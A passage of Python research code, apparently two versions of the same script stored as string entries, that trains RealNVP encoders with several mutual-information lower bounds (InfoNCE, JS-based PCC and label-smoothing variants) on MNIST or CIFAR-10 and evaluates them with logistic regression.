tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],),\n initializer=self.scale_initializer,\n trainable=True,\n name='{}_scale'.format(self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],),\n initializer=self.bias_initializer,\n trainable=True,\n name='{}_bias'.format(self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1/(std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS//2, output_dim=100,\n activation=tf.nn.relu):\n # Note: This works only for the specific data set considered here.\n super(ConvNet, self).__init__([\n tfkl.Reshape((14, 28, 1), input_shape=(input_dim,)),\n tfkl.Conv2D(channels, kernel_size, strides=2,\n padding=\"same\", activation=activation),\n tfkl.Conv2D(2*channels, kernel_size, strides=2,\n padding=\"same\", activation=activation),\n LayerNorm(),\n tfkl.GlobalAveragePooling2D(),\n tfkl.Dense(output_dim),\n ])\n\nfrom tensorflow_probability.python.internal import tensorshape_util\nimport tensorflow.compat.v1 as tf1\nfrom tensorflow_probability.python.bijectors import affine_scalar\nfrom tensorflow_probability.python.bijectors import bijector as bijector_lib\n\n# Modified from tensorflow_probability/python/bijectors/real_nvp.py\nclass RealNVP(bijector_lib.Bijector):\n def __init__(self,\n num_masked,\n shift_and_log_scale_fn=None,\n bijector_fn=None,\n is_constant_jacobian=False,\n validate_args=False,\n name=None):\n name = name 
or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n # At construction time, we don't know input_depth.\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError('Exactly one of `shift_and_log_scale_fn` and '\n '`bijector_fn` should be specified.')\n if shift_and_log_scale_fn:\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n # ** First modification is here.\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n\n bijector_fn = _bijector_fn\n\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n\n # Still do this assignment for variable tracking.\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n\n super(RealNVP, self).__init__(\n forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian,\n validate_args=validate_args,\n name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(\n tensorshape_util.with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.')\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.')\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(\n x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(\n y1, event_ndims=1)\n\ndef real_nvp_default_template(hidden_layers,\n shift_only=False,\n activation=tf.nn.relu,\n name=None,\n *args, # pylint: disable=keyword-arg-before-vararg\n **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(\n inputs=x,\n units=units,\n activation=activation,\n *args, # pylint: disable=keyword-arg-before-vararg\n **kwargs)\n x = tf1.layers.dense(\n inputs=x,\n units=(1 if shift_only else 2) * output_units,\n activation=None,\n *args, # pylint: 
disable=keyword-arg-before-vararg\n **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n # ** Here is the second modification.\n return reshape_output(shift), 1e-7 + tf.nn.softplus(reshape_output(log_scale))\n\n return tf1.make_template('real_nvp_default_template', _fn)\n\nclass RealNVPBijector(tf.keras.Model):\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions)\n for _ in range(n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(\n dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\nclass InnerProdCritic(tf.keras.Model):\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\nclass BilinearCritic(tf.keras.Model):\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n# https://colab.research.google.com/github/google-research/google-research/blob/master/vbmi/vbmi_demo.ipynb\nclass ConcatCritic(tf.keras.Model):\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n # output is scalar score\n self._f = MLP([hidden_dim for _ in range(layers)]+[1], False, {\"activation\": \"relu\"})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n # Tile all possible combinations of x and y\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n # xy is [batch_size * batch_size, x_dim + y_dim]\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2),\n [batch_size * batch_size, -1])\n # Compute scores for each x_i, y_j pair.\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n def __init__(self, hidden_dim=100, output_dim=100, layers=1,\n activation='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim], False, {\"activation\": activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim], False, {\"activation\": activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\ndef train(g1,\n g2,\n critic,\n loss_fn,\n learning_rate,\n batch_size=TRAIN_BATCH_SIZE,\n n_iters=15000,\n n_evals=15,\n compute_jacobian=False,\n noise_std=0.0,\n data_dimensions=DIMS//2,\n n_iter=1,\n loss_name='InfoNCE',\n ):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. 
By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, \"X1 and X2 shapes must agree to add noise!\"\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n\n # Compute the representations.\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n # Compute the Jacobian of g1 if needed.\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n\n # Optimizer setup.\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n\n # Subgraph for eval (add noise to input if necessary)\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None, data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(input=data_ph))\n codes = g1(data_ph_noisy)\n\n training_losses, testing_losses, classification_accuracies, iters, sigmas \\\n = [], [], [], [], []\n # Main training loop.\n for iter_n in range(n_iters):\n # Evaluate the model performance.\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes, data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(\n get_testing_loss(x_test, session, loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\"{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}\".format(\\\n n_iter, loss_name, iter_n, accuracy, args.dataset, args.batch_size, args.lr))\n # Run one optimization step.\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n\n return Results(iterations=iters,\n training_losses=training_losses,\n testing_losses=testing_losses,\n classification_accuracies=classification_accuracies,\n singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print(\"[New experiment] encoder: {}, critic: {}, loss: {}\".format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print(\"{:d}th run, loss: {}\".format(n, loss_name))\n if loss_name == \"drfc\" and TFDS_NAME == \"cifar10\":\n results = train(g1, g2, critic, loss_fn, **kwargs, learning_rate=LEARNING_RATE, n_iter=n, loss_name=loss_name)\n #results = train(g1, g2, critic, loss_fn, **kwargs, learning_rate=1e-4, n_iter=n, loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs, learning_rate=LEARNING_RATE, n_iter=n, loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print(\"Run {} 
failed! Error: {}\".format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(\n result, exp_name, nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((\n ResultsConfig(nets_name, critic_name, loss_name), results_per_run\n ))\n\n return {\n \"df\": pd.concat(data_frames),\n \"singular_values\": results_with_singular_values\n }\n\n#@title Run experiment or load precomputed results { display-mode: \"form\" }\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n #nwj_loss = lambda x: -nwj_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n\n loss_fcts = {\n # \"wpc\": wpc_loss,\n \"pcc\": pcc_loss,\n # \"drfc\": drfc_loss,\n #\"nwj\": nwj_loss,\n \"cpc\": cpc_loss,\n # \"skew_pcc\": skew_pcc_loss,\n \"ls_pcc\": ls_pcc_loss,\n \"prels_pcc\": pre_ls_pcc_loss,\n \"adap_pred_pcc\": adap_pred_smooth_pcc_loss,\n \"adap_label_pcc\": adap_label_smooth_pcc_loss\n }\n kwargs = dict(\n shift_only=True,\n activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(stddev=0.0001),\n bias_initializer='zeros')\n nets = {\n \"realnvp\": lambda: (\n RealNVPBijector(DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=kwargs),\n RealNVPBijector(DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=kwargs)\n )\n }\n critics = {\n \"bilinear\": lambda: BilinearCritic(feature_dim=DIMS//2),\n }\n return run_sweep(nets, critics, loss_fcts, \"invertible\", n_iters=21000, n_evals=21)\n\nif RUN_EXPERIMENTS:\n data_invertible = run_all_experiments()[\"df\"]\n data_invertible.to_pickle(RESULT_DIR)\nelse:\n os.system(\"wget -q -N https://storage.googleapis.com/mi_for_rl_files/mi_results.pkl\")\n data_invertible = pd.read_pickle('mi_results.pkl')\n data_invertible = data_invertible[data_invertible.exp_name == \"invertible\"]\n",
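The entry above (and the reformatted entry that follows) defines a family of variational mutual-information estimators on a square critic matrix whose diagonal holds the positive (joint) pairs. As a reading aid for this dump, here is a minimal NumPy sketch of what `infonce_lower_bound` and `js_fgan_lower_bound` compute; the `_np` names, the random scores matrix, and the batch size 128 are illustrative assumptions only, while the original entries implement the same formulas on TensorFlow tensors inside the training graph.

# Illustrative sketch only; not part of the corpus entries above or below.
import numpy as np
from scipy.special import logsumexp

def infonce_lower_bound_np(scores):
    # mean_i [ f(x_i, y_i) - logsumexp_j f(x_i, y_j) ] + log(batch_size)
    n = scores.shape[0]
    nll = np.mean(np.diag(scores) - logsumexp(scores, axis=1))
    return np.log(n) + nll

def softplus(x):
    # log(1 + exp(x)), computed stably.
    return np.logaddexp(0.0, x)

def js_fgan_lower_bound_np(f):
    # Diagonal entries act as joint samples, off-diagonal entries as marginal samples:
    # E_joint[-softplus(-f)] - E_marg[softplus(f)].
    n = f.shape[0]
    f_diag = np.diag(f)
    first_term = np.mean(-softplus(-f_diag))
    second_term = (softplus(f).sum() - softplus(f_diag).sum()) / (n * (n - 1.0))
    return first_term - second_term

rng = np.random.default_rng(0)
scores = rng.normal(size=(128, 128))   # hypothetical critic matrix
print(infonce_lower_bound_np(scores))  # never exceeds log(128)
print(js_fgan_lower_bound_np(scores))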
"from __future__ import division\nfrom __future__ import print_function\nimport collections\nimport copy\nimport functools\nimport itertools\nimport os\nimport pickle\nimport argparse\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import FuncFormatter\nimport numpy as np\nimport pandas as pd\nfrom scipy.ndimage import gaussian_filter1d\nimport seaborn as sns\nimport tensorflow as tf\nfrom tensorflow.python.ops.parallel_for import gradients\nimport tensorflow_datasets as tfds\nimport tensorflow_probability as tfp\nimport sklearn.linear_model as sk_linear\nparser = argparse.ArgumentParser(description=\n 'Representation Learning Experiments')\nparser.add_argument('--dataset', default='mnist', type=str, help=\n 'cifar10 or mnist')\nparser.add_argument('--lr', default=0.0001, type=float, help='learning rate')\nparser.add_argument('--batch_size', default=100, type=int, help=\n 'mini batch size')\nparser.add_argument('--smoothing', default=0.01, type=float, help=\n 'label smoothing parameter')\nparser.add_argument('--output_dir', type=str, default='./runs', help=\n 'directory where the results will be stored')\nargs = parser.parse_args()\na, b, c = 0.005, 0.1, 0.9\nif not os.path.isdir(args.output_dir):\n os.mkdir(args.output_dir)\nTFDS_NAME = args.dataset\nNRUNS = 10\nif TFDS_NAME == 'mnist':\n DIMS = 784\nelif TFDS_NAME == 'cifar10':\n DIMS = 3072\nLEARNING_RATE = args.lr\nN_CLASSES = 10\nTRAIN_BATCH_SIZE = args.batch_size\nRESULT_DIR = './runs/{}_nrun={}_lr={}_batch={}.pkl'.format(TFDS_NAME, NRUNS,\n LEARNING_RATE, TRAIN_BATCH_SIZE)\nRUN_EXPERIMENTS = True\nFEATURE_INPUT = 'image'\nFEATURE_LABEL = 'label'\ntfb = tfp.bijectors\ntfd = tfp.distributions\ntfkl = tf.keras.layers\ntf.keras.backend.clear_session()\nResultsConfig = collections.namedtuple('ResultsConfig', ['nets', 'critic',\n 'loss'])\nResults = collections.namedtuple('Results', ['iterations',\n 'training_losses', 'testing_losses', 'classification_accuracies',\n 'singular_values'])\nResultsAdversarial = collections.namedtuple('ResultsAdversarial', [\n 'losses_e', 'losses_c', 'classification_accuracies', 'iters'])\nResultsSamplingIssues = collections.namedtuple('ResultsSamplingIssues', [\n 'mi_true', 'nce_estimates_noniid', 'nce_estimates_iid',\n 'nwj_estimates_noniid', 'nwj_estimates_iid'])\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n 
ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\ndef nwj_lower_bound(scores):\n return tuba_lower_bound(scores - 1.0)\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. 
(2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\[email protected]\ndef adap_pred_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n pre_prob = (1.0 - alpha) * pre_prob + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\ntf.compat.v1.reset_default_graph()\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\ndef load_data(split):\n return tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split\n ).cache().map(map_func=map_fn).shuffle(1000)\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = 
np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\ndataset_train = load_data('train')\ndataset_test = load_data('test')\nx_train, y_train = tfds_to_np(dataset_train)\nx_test, y_test = tfds_to_np(dataset_test)\ntf.compat.v1.reset_default_graph()\nx_train_noisy = x_train + 0.05 * np.random.randn(*x_train.shape)\nx_test_noisy = x_test + 0.05 * np.random.randn(*x_test.shape)\nprint('Fit on half the pixels: {}. It should be around 0.835.'.format(\n logistic_fit(x_train_noisy[:, :DIMS // 2], y_train, x_test_noisy[:, :\n DIMS // 2], y_test)))\n\n\ndef processed_train_data(dims, batch_size):\n dataset = load_data('train')\n dataset_batched = dataset.repeat().batch(batch_size, drop_remainder=True)\n get_next = tf.compat.v1.data.make_one_shot_iterator(dataset_batched\n ).get_next()\n features = get_next[FEATURE_INPUT]\n labels = get_next[FEATURE_LABEL]\n x_1, x_2 = tf.split(features, [dims, DIMS - dims], axis=-1)\n return x_1, x_2, labels\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\nfrom tensorflow_probability.python.internal import tensorshape_util\nimport tensorflow.compat.v1 as tf1\nfrom tensorflow_probability.python.bijectors import affine_scalar\nfrom tensorflow_probability.python.bijectors import bijector as bijector_lib\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def 
